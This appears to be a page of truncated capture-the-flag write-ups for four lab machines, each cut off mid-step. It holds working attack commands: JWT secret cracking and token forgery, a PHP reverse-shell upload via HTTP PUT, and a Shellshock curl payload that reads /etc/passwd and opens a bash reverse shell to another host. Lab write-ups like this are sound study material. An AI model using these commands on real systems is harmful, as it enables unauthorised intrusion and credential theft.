All about CTF writeups

Here's my solution for MoneyHeist:1. The machine can be downloaded from here. Port Scanning Using nmap to scan all TCP ports. nmap -sC -sV -p- 192.168.1.104 We find 5 ports open. Enumeration Browsing the web. We see we have an option to register. After registering we login. The page says- No flag and only the admins will get it. We can guess this can be related with user id, user role, cookies etc. We start the Inspect Element and navigate to Storage Tab > Cookies. Interesting, here we find the presence of JWT tokens in cookies. Lets decode it. We browse the website JWT and decode the value. We find the token uses HS256 algorithm. Now we put the key into a file and run hashcat against it. $ hashcat -m 16500 key.hash /usr/share/wordlists/rockyou.txt We get the secret key as- professor. We again browse the JWT website and try to create a forge token. We place the secret key in the Verify Signature section and alter the email's value to- admin.   Now we copy this forged token

Here's my solution for SickOs:1.2. The machine can be downloaded from here. Port Scanning Using nmap to scan all TCP ports. $ nmap -sC -sV -p- 192.168.1.102 We find 2 ports open. Enumeration Browsing the web. Using dirb to scan directories. dirb http://192.168.1.102 -r Interesting, lets browse /test directory. We check for HTTP methods. Interesting. We find that PUT method is allowed, so we can easily upload the shell. Before uploading the php reverse shell file we first edit the listening IP and set the listening port number to 443. Lets upload the shell. $ curl -v --upload-file shell.php http://192.168.1.102/test/ -0 We have successfully uploaded the shell. Initial Access Now to run the exploit we simply click the shell file. And on the other hand we start the netcat listener. We get the reverse shell file. Privilege Escalation We check the cron directories, seems that chkrootkit runs daily. $ ls -la /etc/cron* We check the version. We search for the exploit and we find one. $ se

Here's  my solution for SickOs:1.1. The machine can be downloaded from here. Port Scanning Using nmap to scan all TCP ports. $ nmap -Pn -sC -sV -p- 192.168.1.107 We find 2 ports open. Enumeration Before browsing the web we first set the proxy. Now lets browse the web. Using dirb to scan directories. $ dirb http://192.168.1.107 -p 192.168.1.107:3128   Further scanning the /cgi-bin directory. $ dirb http://192.168.1.107/cgi-bin/ -p 192.168.1.107:3128 Browsing /status. Initial Access Trying for shell shock. $ curl --proxy http://192.168.1.107:3128 -H "user-agent: () { :; }; echo; echo; /bin/sh -c 'cat /etc/passwd'" http://192.168.1.107/cgi-bin/status This seems working fine. Lets get the shell. $ curl --proxy http://192.168.1.107:3128 -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.108/1234 0>&1'" http://192.168.1.107/cgi-bin/status  We get the shell. Privilege Escalation From www-data > sickos. We

Here's my solution for Cheesey:Cheeseyjack. The machine can be downloaded from here. Port Scanning Using Nmap to scan all TCP  Ports. $ nmap -sC -sV -p- 192.168.1.106 We find 11 ports open. Enumeration Browsing the web. Using dirb to scan the directories. $ dirb http://192.168.1.106 -r Browsing /it_security.   Lets check this note.txt From this message, we can take a note on the names- cheese and crab can be user names. Browsing /project_management. Interesting, a login page. Since SMB ports are open we run enum4linux against the host to find some useful information. $ enum4linux -a 192.168.1.106 Interesting. We find 2 users- ch33sem4n and crab. The author has already given us the hint as- cewl. We use cewl to generate passwords for us. $ cewl http://192.168.1.106/project_management > password We user burp to brute force the password of the user- ch33s3m4n.   We get the password as- qdpm. We browse the login page and login with the credential- Email: ch33s3m4n@cheeseyjack.local